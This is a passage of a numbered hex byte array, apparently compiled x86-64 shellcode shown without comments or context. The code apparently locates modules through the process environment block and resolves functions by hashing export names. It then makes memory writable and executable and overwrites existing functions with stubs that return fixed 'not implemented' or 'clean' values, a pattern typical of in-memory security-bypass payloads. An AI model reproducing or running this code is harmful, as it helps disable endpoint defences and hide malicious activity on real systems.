1007 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1008 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d,
1009 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1010 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1011 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1012 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48,
1013 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1014 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1015 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1016 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1017 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8,
1018 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1019 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89,
1020 0x4d, 0x28, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1021 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40,
1022 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1023 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1024 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1025 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80,
1026 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1027 0x4d, 0x10, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1028 0x28, 0x48, 0x8b, 0x40, 0x68, 0x8b, 0x55, 0x18, 0x89, 0xd1, 0xff, 0xd0,
1029 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55,
1030 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1031 0x89, 0x45, 0x20, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48,
1032 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01,
1033 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d,
1034 0x10, 0x48, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3,
1035 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1036 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x60,
1037 0x02, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48,
1038 0x89, 0x8d, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x89, 0x95, 0xf8, 0x01, 0x00,
1039 0x00, 0x4c, 0x89, 0x85, 0x00, 0x02, 0x00, 0x00, 0x4c, 0x89, 0x8d, 0x08,
1040 0x02, 0x00, 0x00, 0x48, 0xc7, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x00, 0x00,
1041 0x00, 0x00, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x89, 0x85,
1042 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x8b,
1043 0x40, 0x3c, 0x48, 0x63, 0xd0, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1044 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x8b,
1045 0x85, 0xc0, 0x01, 0x00, 0x00, 0x48, 0x05, 0x88, 0x00, 0x00, 0x00, 0x48,
1046 0x89, 0x85, 0xb8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00,
1047 0x00, 0x8b, 0x00, 0x89, 0x85, 0xb4, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xb4,
1048 0x01, 0x00, 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1049 0x9c, 0x03, 0x00, 0x00, 0x8b, 0x95, 0xb4, 0x01, 0x00, 0x00, 0x48, 0x8b,
1050 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0xa8,
1051 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40,
1052 0x18, 0x89, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xbd, 0xd8, 0x01, 0x00,
1053 0x00, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x62, 0x03,
1054 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x1c,
1055 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1056 0x48, 0x89, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01,
1057 0x00, 0x00, 0x8b, 0x40, 0x20, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01,
1058 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x98, 0x01, 0x00, 0x00,
1059 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x8b, 0x40, 0x24, 0x89, 0xc2,
1060 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1061 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1062 0x8b, 0x40, 0x0c, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00,
1063 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x88, 0x01, 0x00, 0x00, 0xc7, 0x85,
1064 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x29, 0x8b, 0x95,
1065 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x88, 0x01, 0x00, 0x00, 0x48,
1066 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2, 0x8b, 0x85,
1067 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x60, 0x83, 0x85, 0xdc, 0x01,
1068 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1069 0x88, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1070 0x75, 0xc0, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0x60,
1071 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x45, 0x60,
1072 0x48, 0x89, 0xc1, 0xe8, 0x1d, 0x09, 0x00, 0x00, 0x48, 0x89, 0x85, 0x80,
1073 0x01, 0x00, 0x00, 0x8b, 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01,
1074 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
1075 0x85, 0x98, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
1076 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x48, 0x89,
1077 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x95, 0x08, 0x02, 0x00, 0x00,
1078 0x48, 0x8b, 0x85, 0x78, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0xce,
1079 0x08, 0x00, 0x00, 0x48, 0x33, 0x85, 0x80, 0x01, 0x00, 0x00, 0x48, 0x3b,
1080 0x85, 0x00, 0x02, 0x00, 0x00, 0x0f, 0x85, 0xfc, 0x01, 0x00, 0x00, 0x8b,
1081 0x85, 0xd8, 0x01, 0x00, 0x00, 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d,
1082 0x14, 0x00, 0x48, 0x8b, 0x85, 0x90, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1083 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00,
1084 0x00, 0x00, 0x48, 0x8b, 0x85, 0xa0, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0,
1085 0x8b, 0x00, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xf8, 0x01, 0x00, 0x00, 0x48,
1086 0x01, 0xd0, 0x48, 0x89, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1087 0xd0, 0x01, 0x00, 0x00, 0x48, 0x3b, 0x85, 0xa8, 0x01, 0x00, 0x00, 0x0f,
1088 0x82, 0x99, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xb8, 0x01, 0x00, 0x00,
1089 0x8b, 0x40, 0x04, 0x89, 0xc2, 0x48, 0x8b, 0x85, 0xa8, 0x01, 0x00, 0x00,
1090 0x48, 0x01, 0xd0, 0x48, 0x3b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x0f, 0x86,
1091 0x76, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00, 0x00, 0x48,
1092 0x89, 0x85, 0x70, 0x01, 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00,
1093 0x00, 0x00, 0x00, 0x00, 0xeb, 0x3b, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00,
1094 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6,
1095 0x10, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0x20, 0x8b,
1096 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00,
1097 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x3c, 0x2e, 0x74, 0x29, 0x83, 0x85,
1098 0xdc, 0x01, 0x00, 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48,
1099 0x8b, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
1100 0x84, 0xc0, 0x74, 0x0c, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x3b, 0x76,
1101 0xa5, 0xeb, 0x01, 0x90, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1102 0x01, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x64, 0x8b, 0x85, 0xdc, 0x01,
1103 0x00, 0x00, 0x83, 0xc0, 0x02, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x6c,
1104 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0, 0x03, 0x89, 0xc0, 0xc6,
1105 0x44, 0x05, 0x20, 0x6c, 0x8b, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x83, 0xc0,
1106 0x04, 0x89, 0xc0, 0xc6, 0x44, 0x05, 0x20, 0x00, 0x8b, 0x85, 0xdc, 0x01,
1107 0x00, 0x00, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x01, 0x85, 0x70, 0x01,
1108 0x00, 0x00, 0xc7, 0x85, 0xdc, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
1109 0xeb, 0x24, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1110 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x85, 0xdc,
1111 0x01, 0x00, 0x00, 0x88, 0x54, 0x05, 0xa0, 0x83, 0x85, 0xdc, 0x01, 0x00,
1112 0x00, 0x01, 0x8b, 0x95, 0xdc, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x70,
1113 0x01, 0x00, 0x00, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74,
1114 0x09, 0x83, 0xbd, 0xdc, 0x01, 0x00, 0x00, 0x7e, 0x76, 0xbc, 0x8b, 0x85,
1115 0xdc, 0x01, 0x00, 0x00, 0xc6, 0x44, 0x05, 0xa0, 0x00, 0x48, 0x8b, 0x85,
1116 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8d, 0x55, 0x20,
1117 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x85, 0x68, 0x01, 0x00, 0x00,
1118 0x48, 0x83, 0xbd, 0x68, 0x01, 0x00, 0x00, 0x00, 0x74, 0x21, 0x48, 0x8b,
1119 0x85, 0xf0, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8d, 0x55,
1120 0xa0, 0x48, 0x8b, 0x8d, 0x68, 0x01, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
1121 0x85, 0xd0, 0x01, 0x00, 0x00, 0xeb, 0x0b, 0x48, 0xc7, 0x85, 0xd0, 0x01,
1122 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd0, 0x01, 0x00,
1123 0x00, 0xeb, 0x25, 0x83, 0xad, 0xd8, 0x01, 0x00, 0x00, 0x01, 0x83, 0xbd,
1124 0xd8, 0x01, 0x00, 0x00, 0x00, 0x74, 0x0e, 0x48, 0x83, 0xbd, 0xd0, 0x01,
1125 0x00, 0x00, 0x00, 0x0f, 0x84, 0x8a, 0xfd, 0xff, 0xff, 0x48, 0x8b, 0x85,
1126 0xd0, 0x01, 0x00, 0x00, 0x48, 0x81, 0xc4, 0x60, 0x02, 0x00, 0x00, 0x5d,
1127 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d,
1128 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0xc7, 0x45,
1129 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xdc, 0x60, 0x00, 0x00, 0x00,
1130 0x8b, 0x45, 0xdc, 0x65, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xd0, 0x48,
1131 0x8b, 0x45, 0xd0, 0x48, 0x89, 0x45, 0xe8, 0x48, 0x8b, 0x45, 0xe8, 0x48,
1132 0x8b, 0x40, 0x18, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0xe0, 0x48,
1133 0x8b, 0x40, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb, 0x31, 0x48, 0x8b, 0x45,
1134 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x4d, 0x20, 0x48, 0x8b, 0x55,
1135 0x18, 0x49, 0x89, 0xc9, 0x49, 0x89, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b,
1136 0x4d, 0x10, 0xe8, 0x50, 0xfb, 0xff, 0xff, 0x48, 0x89, 0x45, 0xf0, 0x48,
1137 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b,
1138 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x85, 0xc0, 0x74, 0x07, 0x48,
1139 0x83, 0x7d, 0xf0, 0x00, 0x74, 0xbb, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
1140 0xc4, 0x50, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1141 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28,
1142 0x48, 0x8b, 0x45, 0x38, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00,
1143 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1144 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x0f, 0xaf, 0x45, 0x18, 0x5d, 0xc3,
1145 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
1146 0x4c, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x30,
1147 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1148 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b,
1149 0x55, 0x10, 0x8b, 0x45, 0x18, 0x01, 0xd0, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1150 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45,
1151 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1152 0x38, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0, 0x48, 0x89, 0x45,
1153 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00,
1154 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1155 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xac, 0x03, 0x00,
1156 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1157 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1158 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x46, 0xff, 0xff, 0xff, 0x48,
1159 0x8d, 0x05, 0x1a, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1160 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00,
1161 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1162 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1163 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1164 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1165 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49,
1166 0x89, 0xd0, 0x48, 0x8d, 0x15, 0xc3, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1,
1167 0xe8, 0x27, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1168 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4,
1169 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b,
1170 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2, 0xbc, 0x03, 0x00,
1171 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89, 0x45, 0xf0, 0x48,
1172 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9,
1173 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xca, 0xfe, 0xff, 0xff, 0x48,
1174 0x8d, 0x05, 0x9e, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2, 0x48, 0x89, 0xd0,
1175 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79, 0x07, 0xb8, 0x00,
1176 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40,
1177 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0,
1178 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85,
1179 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x37, 0x8b, 0x55,
1180 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x4d,
1181 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x79, 0x02, 0x00, 0x00, 0x48,
1182 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b,
1183 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0,
1184 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40, 0x5d, 0xc3, 0x55,
1185 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c,
1186 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45, 0x20, 0xc7,
1187 0x00, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3,
1188 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x8b, 0x45,
1189 0x10, 0x2b, 0x45, 0x18, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89,
1190 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x44, 0x89, 0x45, 0x20, 0xb8, 0x00,
1191 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x89, 0x4d, 0x10,
1192 0x89, 0x55, 0x18, 0x8b, 0x45, 0x10, 0x99, 0xf7, 0x7d, 0x18, 0x5d, 0xc3,
1193 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x40, 0x48, 0x89, 0x4d, 0x10,
1194 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x30, 0x48, 0x8b, 0x55, 0x10,
1195 0x48, 0x81, 0xc2, 0x4c, 0x03, 0x00, 0x00, 0x48, 0x89, 0xd1, 0xff, 0xd0,
1196 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0xf8, 0x00, 0x75, 0x0a, 0xb8,
1197 0x01, 0x00, 0x00, 0x00, 0xe9, 0x67, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45,
1198 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1199 0x5c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1200 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1201 0x00, 0x00, 0xe9, 0x39, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x15, 0x7f, 0xff,
1202 0xff, 0xff, 0x48, 0x8d, 0x05, 0x61, 0xff, 0xff, 0xff, 0x48, 0x29, 0xc2,
1203 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1204 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x11, 0x01, 0x00, 0x00, 0x48,
1205 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d,
1206 0x45, 0xe8, 0x48, 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40,
1207 0x00, 0x00, 0x00, 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1208 0x00, 0x00, 0xe9, 0xe5, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x48, 0x8b,
1209 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48, 0x8d, 0x15, 0x0a, 0xff, 0xff, 0xff,
1210 0x48, 0x89, 0xc1, 0xe8, 0x20, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10,
1211 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b, 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c,
1212 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d, 0xf0, 0xff, 0xd0, 0x48, 0x8b, 0x45,
1213 0x10, 0x48, 0x8b, 0x40, 0x38, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x81, 0xc2,
1214 0x7c, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x4d, 0xf8, 0xff, 0xd0, 0x48, 0x89,
1215 0x45, 0xf0, 0x48, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
1216 0x00, 0x00, 0xe9, 0x85, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x15, 0xa2, 0xfe,
1217 0xff, 0xff, 0x48, 0x8d, 0x05, 0x76, 0xfe, 0xff, 0xff, 0x48, 0x29, 0xc2,
1218 0x48, 0x89, 0xd0, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xec, 0x85, 0xc0, 0x79,
1219 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x60, 0x48, 0x8b, 0x45, 0x10,
1220 0x48, 0x8b, 0x40, 0x60, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x45, 0xe8, 0x48,
1221 0x8b, 0x4d, 0xf0, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00,
1222 0xff, 0xd0, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb,
1223 0x37, 0x8b, 0x55, 0xec, 0x48, 0x8b, 0x45, 0xf0, 0x49, 0x89, 0xd0, 0x48,
1224 0x8d, 0x15, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8, 0x72, 0x00,
1225 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x60, 0x44, 0x8b,
1226 0x45, 0xe8, 0x8b, 0x55, 0xec, 0x4c, 0x8d, 0x4d, 0xe4, 0x48, 0x8b, 0x4d,
1227 0xf0, 0xff, 0xd0, 0xb8, 0x01, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x40,
1228 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
1229 0x48, 0x83, 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0x4c,
1230 0x89, 0x45, 0x20, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0xeb,
1231 0x10, 0x8b, 0x45, 0x18, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf8, 0x88, 0x10,
